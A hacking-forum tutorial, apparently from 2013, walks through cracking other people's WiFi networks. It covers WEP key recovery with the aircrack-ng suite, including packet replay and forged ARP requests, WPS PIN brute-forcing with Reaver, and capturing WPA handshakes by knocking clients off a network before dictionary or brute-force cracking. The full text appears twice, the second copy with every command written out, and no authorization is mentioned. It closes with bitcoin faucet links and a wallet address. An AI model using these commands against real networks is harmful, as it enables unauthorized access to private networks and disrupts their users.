WiFi 101 05-26-2013, 05:25 PM
#1
Hello HC, I know this has been covered before but thought I'd share my version of events as it were
For this tutorial you will need:
OK here we go.
WEP
I will be very surprised if you come across this any more as it's not very secure and most routers now use WPA2 by default but I will cover it anyway.
First put your card into monitor mode
take note of the name of your card's name in my case its wlan0
should return something like:
Don't worry if it's not exactly the same as some systems and hardware differ slightly as long as you get monitor mode enabled you should be good to go.
What that does is put your card into sniffing mode that lets us pick up beacons from the access point (AP), now lets do some sniffing
will start to sniff for beacons and hop channels to pick up all the networks within range will return something like
That looks a bit messy so we will pick our target from the list (usually a lot longer then 2), and sniff that network
This will filter out everything else and display only the traffic of our target and start to write a capture file in the current directory.
Next you will need to look at weather or not anyone is connected to the network as this will determine the next step.
Leave that terminal running to continue the capture of packets- it is very important you do not stop this until you have the password as this is the file used to crack the password, but we don't have enough packets, and it will take to long if we wait, so what do we do?
Lets speed this up a little bit and start generating some traffic, in a new terminal window enter:
To find your mac address simply type
What this does is sends fake authentication packets to the target AP to trick it into thinking you are associated with it allowing you to send your packets.
With a connected client
Once associated with the target type this :
What this does is capture traffic form the connected client and resends it over and over again generating data for our capture file.
Leave this running and take a look at our capture window after a minute or so notice what happens to the #Data column it will start to increase rapidly, go grab a cup of coffee, you've earned it
You will want to wait untill you have around 10,000 packets catured (Shouldn't take long)
Nearly there now it's time to crack that password
open up yet another terminal and type:
Now just sit back and wait if you don't have enough packets to successfully decrypt the key aircrack will fail, and then wait for more packets so it's just a matter of time, all be it usually a matter of seconds at this point, but can take 10 minutes or so depending on signal strength.
Once found aircrack will stop and display "KEY FOUND: [PA:SS:WO:RD]" just drop the colons and log on to the network
Clientless cracking
Again you will need to fake authenticate onto the network, but then it changes slightly, as there are no clients to capture traffic and resend it we will have to create our own,
When aireplay returns a packet and asks if you would like to keep it say yes and it will be saved as fragment.xor, before we can use the packet we need to manipulate it and turn it into an ARP request.
Start your capture file:
and start throwing your forged packet at the AP in yet another console:
When aireplay finds our packet say yes and it will start broadcasting, we are nearly done!
one more console:
Sit back and wait again should crack the password in a few seconds
With a little practice and a good signal you should be able to crack most WEP encryption keys in less then 5 minutes!
WPA/2
There are 2 ways to do this first my preferred method as this proves to be more reliable
Welcome reaver
Reaver targets the external registrar functionality mandated by the WiFi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar.
In order to authenticate as a registrar, the registrar must prove its knowledge of the AP's 8-digit pin number. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.
Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 100,000,000 possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10,000,000 possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10,000 possible values for the first half of the pin and 1,000 possible values for the second half of the pin, with the last digit of the pin being a checksum.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number, once the pin is guessed the AP will happily dump the plain text password to your console.
Brute forcing using This method can take anywhere from 10 minutes to 10 hours, Reaver will try the most common pin's first and can be paused at any time by hitting Ctrl + c this will stop the program and save it's progress to be resumed at any time, also once Reaver has successfully found the pin it will save it so even if the password is changed it can be recovered in a matter of seconds!
Fist we need to put our card into monitor mode:
Next we check the AP is vulnerable to Reaver, luckily the package contains anouther handy tool:
or if you know the channel the target AP uses:
The tool will filter AP's and only display those vulnerable to the attack next we start reaver:
That's all there is to it Reaver will go do it's thing all you have to do is wait, if nothing happens or you get a lot of errors, you are too far from the AP you will need to move closer or choose a different target
NOTE:
For those with kali linux, reaver doesn't work for those with kali, there is a possibility of the "wash" command not working. You have to reinstall it:
1. wget http://reaver-wps.googlecode.com/files/r...1.4.tar.gz
2. tar -xzvf reaver-1.4.tar.gz
3. cd reaver-1.4
4. cd src
5. ./configure
6. make
7. make install,
credits to @"krypt3dkn1gh7" for providing the fix
Aircrack method
There is no way of brute forcing the password using the aircrack suite but you can still attack the AP with this method however it is slow and is not guaranteed to work, and there must be a client connected in order for this to work as the attack needs to capture the four way handshake (and the password hash), which we will later attempt a dictionary attack.
Start up you card in monitor mode:
start scanning for networks:
Once you find your target you will need to filter the sniffing and start a capture file
Now if there is a client connected you will need to de authorize them in order for them to reconnect so we can capture the handshake:
This will send out de authorization packets and hopefully knock them off the network, once you have done this the capture window will display something like: [ WPA handshake: 00:14:6C:7E:40:80 in the top right corner, you can now stop the capture and start attempting to crack the password
backtrack actually comes with quite a large wordlist located in:
But any will do, and that's it aircrack will go through the words one by one and check them against the hash to see if they match, this is time consuming and not guaranteed to work, if their password isn't in you wordlist you will not crack it.
or method 2: use JTR to feed words into aircrack to bruteforce the password this will work but could take years or even centuries:
If you get bored of typing all those mac addresses you can use this little trick to speed things up in each terminal you use type in:
then
you can then use $AP and $ATT in place of the actual mac addresses
Next check out what you can do once you gain access with my Wireshark tutorial
For this tutorial you will need:
- A laptop running a Linux OS, I will be using Back|track5 as it has all the tools needed already installed
- The Aircrack-ng suite if you don't have it visit the website http://www.aircrack-ng.org
- A wireless card capable of packet injection again visit the Aircrack website for a list of compatible hardware, I will be using an Alfa networks AWUS036H USB adapter as its cheap and offers good range
- Reaver, a tool used to attack WPA2 secured routers
- A decent sized wordlist
- Patience
OK here we go.
WEP
I will be very surprised if you come across this any more as it's not very secure and most routers now use WPA2 by default but I will cover it anyway.
First put your card into monitor mode
Code:
ifconfigtake note of the name of your card's name in my case its wlan0
Code:
airmon-ng start wlan0should return something like:
Code:
Interface Chipset Driver
wlan0 Realtek RTL8187 rtl8187 - [phy1]
(monitor mode enabled on mon0) <--- the bit we're interested inDon't worry if it's not exactly the same as some systems and hardware differ slightly as long as you get monitor mode enabled you should be good to go.
What that does is put your card into sniffing mode that lets us pick up beacons from the access point (AP), now lets do some sniffing
Code:
airodump-ng mon0will start to sniff for beacons and hop channels to pick up all the networks within range will return something like
Code:
[CH11] [Elapsed: 5 min] [2012=07-18 23:55
BSSID PWR Beacons #Data #/s CH MB ENC CIPER AUTH ESSID
00:11:22:33:44:55:66 -66 48 0 0 11 54e WEP PSK TARGET
11:22:33:44:55:66:77 -69 17 0 0 6 54 OPN routername
BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC:DD:EE:FF:GG 00:11:22:33:44:55:66 -65 0-1 0 26 routername <--- users connected to a networkThat looks a bit messy so we will pick our target from the list (usually a lot longer then 2), and sniff that network
Code:
airodump-ng --bssid *TARGETS MAC ADDRESS* -c11 -w TARGET mon0This will filter out everything else and display only the traffic of our target and start to write a capture file in the current directory.
Next you will need to look at weather or not anyone is connected to the network as this will determine the next step.
Leave that terminal running to continue the capture of packets- it is very important you do not stop this until you have the password as this is the file used to crack the password, but we don't have enough packets, and it will take to long if we wait, so what do we do?
Lets speed this up a little bit and start generating some traffic, in a new terminal window enter:
Code:
aireplay-ng -1 0 -a *TARGETS MAC ADDRESS* -h *YOUR MAC ADDRESS* -e TARGET (AP name) mon0To find your mac address simply type
Code:
macchanger mon0What this does is sends fake authentication packets to the target AP to trick it into thinking you are associated with it allowing you to send your packets.
With a connected client
Once associated with the target type this :
Code:
aireplay-ng -3 -b *TARGETS MAC ADDRESS* -h *YOUR MAC ADDRESS* mon0What this does is capture traffic form the connected client and resends it over and over again generating data for our capture file.
Leave this running and take a look at our capture window after a minute or so notice what happens to the #Data column it will start to increase rapidly, go grab a cup of coffee, you've earned it
You will want to wait untill you have around 10,000 packets catured (Shouldn't take long)
Nearly there now it's time to crack that password
open up yet another terminal and type:
Code:
aircrack-ng -b *TARGETS MAC ADDRESS* TARGET-01.cap #(or whatever you called the capture file, airmon will always append a number to the end so be aware of this)Now just sit back and wait if you don't have enough packets to successfully decrypt the key aircrack will fail, and then wait for more packets so it's just a matter of time, all be it usually a matter of seconds at this point, but can take 10 minutes or so depending on signal strength.
Once found aircrack will stop and display "KEY FOUND: [PA:SS:WO:RD]" just drop the colons and log on to the network
Clientless cracking
Again you will need to fake authenticate onto the network, but then it changes slightly, as there are no clients to capture traffic and resend it we will have to create our own,
Code:
aireplay-ng -5 -b *TARGETS MAC ADDRESS* -h *YOUR MAC ADDRESS* mon0When aireplay returns a packet and asks if you would like to keep it say yes and it will be saved as fragment.xor, before we can use the packet we need to manipulate it and turn it into an ARP request.
Code:
packetforge-ng -0 -a *TARGETS MAC ADDRESS* -h *YOUR MAC ADDRESS* -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-requestStart your capture file:
Code:
airodump-ng -c 11 -bssid *TARGETS MAC ADDRESS* --ivs -w filename mon0and start throwing your forged packet at the AP in yet another console:
Code:
aireplay-ng -2 -r arp-request mon0When aireplay finds our packet say yes and it will start broadcasting, we are nearly done!
one more console:
Code:
aircrack-ng -n 64 -b *TARGETS MAC ADDRESS* filename.ivsSit back and wait again should crack the password in a few seconds
With a little practice and a good signal you should be able to crack most WEP encryption keys in less then 5 minutes!
WPA/2
There are 2 ways to do this first my preferred method as this proves to be more reliable
Welcome reaver
Reaver targets the external registrar functionality mandated by the WiFi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar.
In order to authenticate as a registrar, the registrar must prove its knowledge of the AP's 8-digit pin number. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.
Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 100,000,000 possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10,000,000 possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10,000 possible values for the first half of the pin and 1,000 possible values for the second half of the pin, with the last digit of the pin being a checksum.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number, once the pin is guessed the AP will happily dump the plain text password to your console.
Brute forcing using This method can take anywhere from 10 minutes to 10 hours, Reaver will try the most common pin's first and can be paused at any time by hitting Ctrl + c this will stop the program and save it's progress to be resumed at any time, also once Reaver has successfully found the pin it will save it so even if the password is changed it can be recovered in a matter of seconds!
Fist we need to put our card into monitor mode:
Code:
airmon-ng start wlan0Next we check the AP is vulnerable to Reaver, luckily the package contains anouther handy tool:
Code:
wash -i mon0or if you know the channel the target AP uses:
Code:
wash -i mon0 -c 11 -C -s #If the AP is running on channel 11The tool will filter AP's and only display those vulnerable to the attack next we start reaver:
Code:
reaver -i mon0 -b *TARGETS MAC ADDRESS* -vvThat's all there is to it Reaver will go do it's thing all you have to do is wait, if nothing happens or you get a lot of errors, you are too far from the AP you will need to move closer or choose a different target
NOTE:
For those with kali linux, reaver doesn't work for those with kali, there is a possibility of the "wash" command not working. You have to reinstall it:
1. wget http://reaver-wps.googlecode.com/files/r...1.4.tar.gz
2. tar -xzvf reaver-1.4.tar.gz
3. cd reaver-1.4
4. cd src
5. ./configure
6. make
7. make install,
credits to @"krypt3dkn1gh7" for providing the fix
Aircrack method
There is no way of brute forcing the password using the aircrack suite but you can still attack the AP with this method however it is slow and is not guaranteed to work, and there must be a client connected in order for this to work as the attack needs to capture the four way handshake (and the password hash), which we will later attempt a dictionary attack.
Start up you card in monitor mode:
Code:
airmon-ng start wlan0start scanning for networks:
Code:
airodump-ng mon0Once you find your target you will need to filter the sniffing and start a capture file
Code:
airodump-ng -c (channel number) --bssid *TARGETS MAC ADDRESS* -w cap mon0Now if there is a client connected you will need to de authorize them in order for them to reconnect so we can capture the handshake:
Code:
aireplay-ng -0 5 -a *TARGETS MAC ADDRESS* -c *connected client's mac address* mon0This will send out de authorization packets and hopefully knock them off the network, once you have done this the capture window will display something like: [ WPA handshake: 00:14:6C:7E:40:80 in the top right corner, you can now stop the capture and start attempting to crack the password
Code:
aircrack-ng -w (full path to wordlist) -b *TARGETS MAC ADDRESS* cap-01.capbacktrack actually comes with quite a large wordlist located in:
Code:
/pentest/passwords/wordlists/darc0de.lstBut any will do, and that's it aircrack will go through the words one by one and check them against the hash to see if they match, this is time consuming and not guaranteed to work, if their password isn't in you wordlist you will not crack it.
or method 2: use JTR to feed words into aircrack to bruteforce the password this will work but could take years or even centuries:
Code:
john --incremental:alpha --stdout | aircrack-ng -0 *TARGETS MAC ADDRESS* -w- cap-01.capIf you get bored of typing all those mac addresses you can use this little trick to speed things up in each terminal you use type in:
Code:
AP=*TARGETS MAC ADDRESS*Code:
ATT=*YOUR MAC ADDRESS*you can then use $AP and $ATT in place of the actual mac addresses
Next check out what you can do once you gain access with my Wireshark tutorial
If you need help feel free to PM me
![[Image: klfpJD]](http://goo.gl/klfpJD)
Probitcoin
Freebitcoin
BTC clicks
bitcoin wallet:
1FBPAanbs3rJU9BUpobpDJc9hHUaCaC25N
Probitcoin
Freebitcoin
BTC clicks
bitcoin wallet:
1FBPAanbs3rJU9BUpobpDJc9hHUaCaC25N
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
urprised: